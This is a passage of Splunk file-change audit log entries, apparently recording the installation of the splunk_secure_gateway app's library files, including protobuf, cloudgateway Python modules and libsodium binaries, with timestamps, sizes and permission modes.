17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.515, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/protobuf-3.6.1.dist-info/METADATA", isdir=0, size=724, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-rw-rw-", hash=] Audit:[timestamp=10-06-2022 17:42:20.510, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/protobuf-3.6.1.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.504, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/encryption/__pycache__/encryption_handler.cpython-37.pyc", isdir=0, size=1968, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.497, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/encryption/__pycache__/__init__.cpython-37.pyc", isdir=0, size=177, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.390, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/encryption/encryption_handler.py", isdir=0, size=1991, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.386, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/encryption/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:20.381, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/encryption/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.377, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/clients/__pycache__/async_spacebridge_client.cpython-37.pyc", isdir=0, size=2134, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.371, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/clients/__pycache__/aio_client.cpython-37.pyc", isdir=0, size=1944, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.366, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/clients/__pycache__/__init__.cpython-37.pyc", isdir=0, size=182, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.361, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/clients/async_spacebridge_client.py", isdir=0, size=1816, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.355, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/clients/aio_client.py", isdir=0, size=1760, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.351, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/clients/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:20.346, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/clients/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.241, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/__pycache__/cloudgateway_init.cpython-37.pyc", isdir=0, size=4453, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.236, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/__pycache__/aiohttp_wss_protocol.cpython-37.pyc", isdir=0, size=6024, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.231, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/__pycache__/aio_parent_process_monitor.cpython-37.pyc", isdir=0, size=1552, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.225, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/__pycache__/aio_message_handler.cpython-37.pyc", isdir=0, size=4063, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.219, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/__pycache__/__init__.cpython-37.pyc", isdir=0, size=184, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.215, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/cloudgateway_init.py", isdir=0, size=4594, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.211, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/aiohttp_wss_protocol.py", isdir=0, size=8419, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.207, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/aio_parent_process_monitor.py", isdir=0, size=2018, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.203, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/aio_message_handler.py", isdir=0, size=5461, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.197, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:20.192, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.084, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/__pycache__/__init__.cpython-37.pyc", isdir=0, size=174, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.080, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/messages/__pycache__/send.cpython-37.pyc", isdir=0, size=909, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.074, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/messages/__pycache__/__init__.cpython-37.pyc", isdir=0, size=183, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:20.070, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/messages/send.py", isdir=0, size=1220, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.066, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/messages/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:20.062, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/messages/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:20.058, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/websocket", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:20.053, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/messages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:20.050, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/clients", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:20.044, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:20.040, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.934, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__pycache__/tokens_util.cpython-37.pyc", isdir=0, size=1082, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.929, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__pycache__/time_utils.cpython-37.pyc", isdir=0, size=1396, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.924, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__pycache__/splunk_auth_header.cpython-37.pyc", isdir=0, size=643, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.920, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__pycache__/sdk_mode.cpython-37.pyc", isdir=0, size=521, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.916, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__pycache__/logger.cpython-37.pyc", isdir=0, size=581, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.909, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__pycache__/http_status.cpython-37.pyc", isdir=0, size=5956, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.904, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__pycache__/constants.cpython-37.pyc", isdir=0, size=995, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.899, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__pycache__/config.cpython-37.pyc", isdir=0, size=4973, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.893, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__pycache__/__init__.cpython-37.pyc", isdir=0, size=171, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.889, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/twisted_utils.py", isdir=0, size=555, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.883, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/tokens_util.py", isdir=0, size=991, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.878, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/time_utils.py", isdir=0, size=1152, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.874, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/splunk_auth_header.py", isdir=0, size=196, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.870, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/sdk_mode.py", isdir=0, size=200, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.866, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/logger.py", isdir=0, size=90, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.862, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/http_status.py", isdir=0, size=6180, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.857, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/dev.py", isdir=0, size=555, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.851, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/constants.py", isdir=0, size=818, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.845, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/config.py", isdir=0, size=5209, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.840, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:19.834, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.728, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/websocket/__pycache__/parent_process_monitor.cpython-37.pyc", isdir=0, size=2752, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.724, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/websocket/__pycache__/cloudgateway_connector.cpython-37.pyc", isdir=0, size=5564, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.720, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/websocket/__pycache__/__init__.cpython-37.pyc", isdir=0, size=176, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.614, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/websocket/parent_process_monitor.py", isdir=0, size=3168, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.610, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/websocket/cloudgateway_connector.py", isdir=0, size=7866, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.607, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/websocket/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:19.602, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/websocket/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.598, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/__pycache__/util.cpython-37.pyc", isdir=0, size=2572, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.594, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/__pycache__/mdm.cpython-37.pyc", isdir=0, size=4557, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.589, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/__pycache__/__init__.cpython-37.pyc", isdir=0, size=179, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.585, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/util.py", isdir=0, size=1706, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.582, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/unregister.py", isdir=0, size=2395, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.577, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/pairing.py", isdir=0, size=5427, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.572, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/mdm.py", isdir=0, size=5316, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.569, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/client.py", isdir=0, size=12608, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.565, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/authenticate.py", isdir=0, size=3343, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.559, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:19.554, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.449, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/__pycache__/__init__.cpython-37.pyc", isdir=0, size=166, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.445, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/exceptions/__pycache__/rest.cpython-37.pyc", isdir=0, size=1389, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.440, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/exceptions/__pycache__/__init__.cpython-37.pyc", isdir=0, size=177, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.435, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/exceptions/rest.py", isdir=0, size=591, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/exceptions/asyncio.py", isdir=0, size=55, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.427, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/exceptions/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:19.424, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/exceptions/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.320, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/__pycache__/sharedlib_sodium_client.cpython-37.pyc", isdir=0, size=3225, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.315, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/__pycache__/pysodium.cpython-37.pyc", isdir=0, size=42378, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.311, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/__pycache__/errors.cpython-37.pyc", isdir=0, size=1214, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.308, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/__pycache__/__init__.cpython-37.pyc", isdir=0, size=420, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:19.301, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/sharedlibs/libsodium.so", isdir=0, size=2197800, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.297, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/sharedlibs/libsodium.dylib", isdir=0, size=799120, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.292, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/sharedlibs/libsodium.dll", isdir=0, size=317256, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.287, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/sharedlibs/libsodium.def", isdir=0, size=29313, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.283, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/sodium/sodium_server_pb2.py", isdir=0, size=46801, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.278, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/sodium/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.173, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/subprocess_sodium_client.py", isdir=0, size=5933, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.167, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/sodium", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:19.160, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/sharedlibs", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:19.156, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/sharedlib_sodium_client.py", isdir=0, size=2603, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.152, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/pysodium.py", isdir=0, size=66982, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.147, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/libsodium-server-win.exe", isdir=0, size=4190114, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.143, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/libsodium-server-mac", isdir=0, size=4934272, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.139, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/libsodium-server-linux", 